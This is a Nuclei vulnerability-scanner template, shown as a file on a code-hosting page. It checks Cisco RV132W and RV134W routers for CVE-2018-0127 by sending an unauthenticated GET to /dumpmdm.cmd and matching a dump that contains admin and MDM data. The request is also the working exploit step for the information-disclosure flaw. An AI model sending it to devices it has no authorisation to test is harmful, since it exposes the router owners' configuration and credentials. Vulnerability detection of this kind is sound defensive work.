nuclei-templates/cves/2018/CVE-2018-0127.yaml

27 lines
620 B
YAML
Raw Normal View History

2021-10-01 19:30:31 +00:00
id: CVE-2018-0127
info:
name: Cisco RV132W and RV134W Wireless VPN Routers Unauthenticated Information Disclosure Vulnerability
author: jrolf
severity: critical
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2018-0127
description: Detects Cisco devices vulnerable to CVE-2018-0127
tags: cve,cve2018,cisco
requests:
- method: GET
path:
- "{{BaseURL}}/dumpmdm.cmd"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "Dump"
- "MDM"
- "cisco"
- "admin"
part: body